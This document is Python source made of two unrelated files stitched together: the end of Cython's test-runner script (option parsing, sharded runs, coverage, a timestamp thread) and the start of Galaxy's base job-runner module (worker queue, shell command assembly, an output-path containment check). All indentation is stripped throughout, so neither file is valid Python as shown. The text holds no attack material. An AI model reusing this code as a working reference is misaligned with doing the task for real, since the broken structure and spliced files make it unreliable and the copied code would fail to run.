if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
    # code style checks need recursive glob ('**', Python 3.5+) and are skipped when specific tests are selected.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
error_shards = []
failure_outputs = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code, failure_output in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
error_shards.append(shard_num)
failure_outputs.append(failure_output)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if error_shards:
sys.stderr.write("Errors found in shards %s\n" % ", ".join([str(e) for e in error_shards]))
for failure_output in zip(error_shards, failure_outputs):
sys.stderr.write("\nErrors from shard %s:\n%s" % failure_output)
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code, _ = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
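# Usage note (added for clarity): main() wraps the whole test run in this
# context manager, roughly
#
#     with time_stamper_thread(interval=keep_alive_interval):
#         ... run the (possibly sharded) tests ...
#
# so that build logs keep receiving '#### <timestamp>' lines during slow tests.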
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CDEFS.append(('CYTHON_REFNANNY', '1'))
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
    # which depend on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'CI' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
result_code = 0 if options.exit_ok else not result.wasSuccessful()
if xml_output_dir:
failure_output = ""
else:
failure_output = "".join(collect_failure_output(result))
return options.shard_num, stats, result_code, failure_output
def collect_failure_output(result):
"""Extract test error/failure output from a TextTestResult."""
failure_output = []
for flavour, errors in (("ERROR", result.errors), ("FAIL", result.failures)):
for test, err in errors:
failure_output.append("%s\n%s: %s\n%s\n%s\n" % (
result.separator1,
flavour, result.getDescription(test),
result.separator2,
err))
return failure_output
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
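# Invocation sketch (added note, using only the options defined above and
# assuming this module is saved as the project's runtests.py script):
#
#     python runtests.py -vv bugs                  # run tests matching 'bugs', verbose
#     python runtests.py -j8 --backends=c,cpp      # shard the run across 8 processes
#     python runtests.py -x pyregr --no-examples   # exclude a pattern, skip example tests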
|
__init__.py
|
"""
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
log = logging.getLogger( __name__ )
STOP_SIGNAL = object()
class BaseJobRunner( object ):
def __init__( self, app, nworkers ):
"""Start the job runner
"""
self.app = app
self.sa_session = app.model.context
self.nworkers = nworkers
def _init_worker_threads(self):
"""Start ``nworkers`` worker threads.
"""
self.work_queue = Queue()
self.work_threads = []
log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
for i in range(self.nworkers):
worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
worker.setDaemon( True )
worker.start()
self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while 1:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
# Causes a runner's `queue_job` method to be called from a worker thread
def put(self, job_wrapper):
"""Add a job to the queue (by job identifier), indicate that the job is ready to run.
"""
# Change to queued state before handing to worker thread so the runner won't pick it up again
job_wrapper.change_state( model.Job.states.QUEUED )
# Persist the destination so that the job will be included in counts if using concurrency limits
job_wrapper.set_job_destination( job_wrapper.job_destination, None )
self.mark_as_queued(job_wrapper)
def mark_as_queued(self, job_wrapper):
self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
# Most runners should override the legacy URL handler methods and destination param method
def url_to_destination(self, url):
"""
Convert a legacy URL to a JobDestination.
Job runner URLs are deprecated, JobDestinations should be used instead.
This base class method converts from a URL to a very basic
JobDestination without destination params.
"""
return galaxy.jobs.JobDestination(runner=url.split(':')[0])
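    # Added example (hedged): a legacy URL such as 'local:///' or 'drmaa://queue/'
    # maps to JobDestination(runner='local') / JobDestination(runner='drmaa'),
    # since only the scheme part before the first ':' is kept here.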
def parse_destination_params(self, params):
"""Parse the JobDestination ``params`` dict and return the runner's native representation of those params.
"""
raise NotImplementedError()
def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True):
"""Some sanity checks that all runners' queue_job() methods are likely to want to do
"""
job_id = job_wrapper.get_id_tag()
job_state = job_wrapper.get_state()
job_wrapper.is_ready = False
job_wrapper.runner_command_line = None
# Make sure the job hasn't been deleted
if job_state == model.Job.states.DELETED:
log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
if self.app.config.cleanup_job in ( "always", "onsuccess" ):
job_wrapper.cleanup()
return False
elif job_state != model.Job.states.QUEUED:
log.info( "(%d) Job is in state %s, skipping execution" % ( job_id, job_state ) )
# cleanup may not be safe in all states
return False
# Prepare the job
try:
job_wrapper.prepare()
job_wrapper.runner_command_line = self.build_command_line( job_wrapper, include_metadata=include_metadata, include_work_dir_outputs=include_work_dir_outputs )
except:
log.exception("(%s) Failure preparing job" % job_id)
job_wrapper.fail( "failure preparing job", exception=True )
return False
if not job_wrapper.runner_command_line:
job_wrapper.finish( '', '' )
return False
return True
# Runners must override the job handling methods
def queue_job(self, job_wrapper):
raise NotImplementedError()
def stop_job(self, job):
raise NotImplementedError()
def recover(self, job, job_wrapper):
raise NotImplementedError()
def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True ):
"""
Compose the sequence of commands necessary to execute a job. This will
currently include:
- environment settings corresponding to any requirement tags
- preparing input files
- command line taken from job wrapper
- commands to set metadata (if include_metadata is True)
"""
commands = job_wrapper.get_command_line()
# All job runners currently handle this case which should never
# occur
if not commands:
return None
# Prepend version string
if job_wrapper.version_string_cmd:
commands = "%s &> %s; " % ( job_wrapper.version_string_cmd, job_wrapper.get_version_string_path() ) + commands
# prepend getting input files (if defined)
if hasattr(job_wrapper, 'prepare_input_files_cmds') and job_wrapper.prepare_input_files_cmds is not None:
commands = "; ".join( job_wrapper.prepare_input_files_cmds + [ commands ] )
# Prepend dependency injection
if job_wrapper.dependency_shell_commands:
commands = "; ".join( job_wrapper.dependency_shell_commands + [ commands ] )
# Append commands to copy job outputs based on from_work_dir attribute.
if include_work_dir_outputs:
work_dir_outputs = self.get_work_dir_outputs( job_wrapper )
if work_dir_outputs:
commands += "; " + "; ".join( [ "if [ -f %s ] ; then cp %s %s ; fi" %
( source_file, source_file, destination ) for ( source_file, destination ) in work_dir_outputs ] )
# Append metadata setting commands, we don't want to overwrite metadata
# that was copied over in init_meta(), as per established behavior
if include_metadata:
commands += "; cd %s; " % os.path.abspath( os.getcwd() )
commands += job_wrapper.setup_external_metadata(
exec_dir = os.path.abspath( os.getcwd() ),
tmp_dir = job_wrapper.working_directory,
dataset_files_path = self.app.model.Dataset.file_path,
output_fnames = job_wrapper.get_output_fnames(),
set_extension = False,
kwds = { 'overwrite' : False } )
return commands
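    # Added illustration (hedged, not from the original docs): after the prepends
    # and appends above, the composed string looks roughly like
    #   <dependency_cmds>; <input_file_cmds>; <version_cmd> &> <version_file>; <tool_cmd>; \
    #   if [ -f <work_dir_out> ] ; then cp <work_dir_out> <dest> ; fi; cd <cwd>; <set_metadata_cmd>
    # with each piece included only when the corresponding flag/attribute is set.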
def get_work_dir_outputs( self, job_wrapper ):
"""
Returns list of pairs (source_file, destination) describing path
to work_dir output file and ultimate destination.
"""
def in_directory( file, directory ):
"""
            Return True if the common prefix of ``file`` and ``directory`` equals ``directory``;
            e.g. for /a/b/c/d.rst and directory /a/b, the common prefix is /a/b.
"""
# Make both absolute.
directory = os.path.abspath( directory )
file = os.path.abspath( file )
return os.path.commonprefix( [ file, directory ] ) == directory
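        # Added note: os.path.commonprefix() compares the raw strings character by
        # character, so this is a best-effort containment check, e.g.
        #     in_directory('/a/b/c/d.rst', '/a/b')  -> True
        #     in_directory('/a/b/../evil', '/a/b')  -> False  (abspath resolves '..')
        # but a sibling such as '/a/bc/x' would also be accepted, because '/a/b' is
        # a plain string prefix of '/a/bc/x'.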
# Set up dict of dataset id --> output path; output path can be real or
# false depending on outputs_to_working_directory
output_paths = {}
for dataset_path in job_wrapper.get_output_fnames():
path = dataset_path.real_path
if self.app.config.outputs_to_working_directory:
path = dataset_path.false_path
output_paths[ dataset_path.dataset_id ] = path
output_pairs = []
# Walk job's output associations to find and use from_work_dir attributes.
job = job_wrapper.get_job()
job_tool = self.app.toolbox.tools_by_id.get( job.tool_id, None )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
if joda and job_tool:
hda_tool_output = job_tool.outputs.get( joda.name, None )
if hda_tool_output and hda_tool_output.from_work_dir:
# Copy from working dir to HDA.
# TODO: move instead of copy to save time?
source_file = os.path.join( os.path.abspath( job_wrapper.working_directory ), hda_tool_output.from_work_dir )
destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
if in_directory( source_file, job_wrapper.working_directory ):
output_pairs.append( ( source_file, destination ) )
log.debug( "Copying %s to %s as directed by from_work_dir" % ( source_file, destination ) )
else:
# Security violation.
log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
return output_pairs
def _handle_metadata_externally(self, job_wrapper):
"""
        Set metadata externally. Used by the local and lwr job runners, where
        metadata setting should not be appended to the command line that is executed.
"""
#run the metadata setting script here
#this is terminate-able when output dataset/job is deleted
#so that long running set_meta()s can be canceled without having to reboot the server
if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
set_extension=True,
tmp_dir=job_wrapper.working_directory,
#we don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
kwds={ 'overwrite' : False } )
log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
external_metadata_proc = subprocess.Popen( args=external_metadata_script,
shell=True,
env=os.environ,
preexec_fn=os.setpgrp )
job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
external_metadata_proc.wait()
log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
class AsynchronousJobState( object ):
"""
Encapsulate the state of an asynchronous job, this should be subclassed as
needed for various job runners to capture additional information needed
to communicate with distributed resource manager.
"""
def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
self.old_state = None
self.running = False
self.check_count = 0
self.job_wrapper = job_wrapper
# job_id is the DRM's job id, not the Galaxy job id
self.job_id = job_id
self.job_destination = job_destination
self.job_file = job_file
self.output_file = output_file
self.error_file = error_file
self.exit_code_file = exit_code_file
self.job_name = job_name
self.set_defaults( files_dir )
self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]
def set_defaults( self, files_dir ):
if self.job_wrapper is not None:
id_tag = self.job_wrapper.get_id_tag()
if files_dir is not None:
self.job_file = os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )
self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
job_name = 'g%s' % id_tag
if self.job_wrapper.tool.old_id:
job_name += '_%s' % self.job_wrapper.tool.old_id
if self.job_wrapper.user:
job_name += '_%s' % self.job_wrapper.user
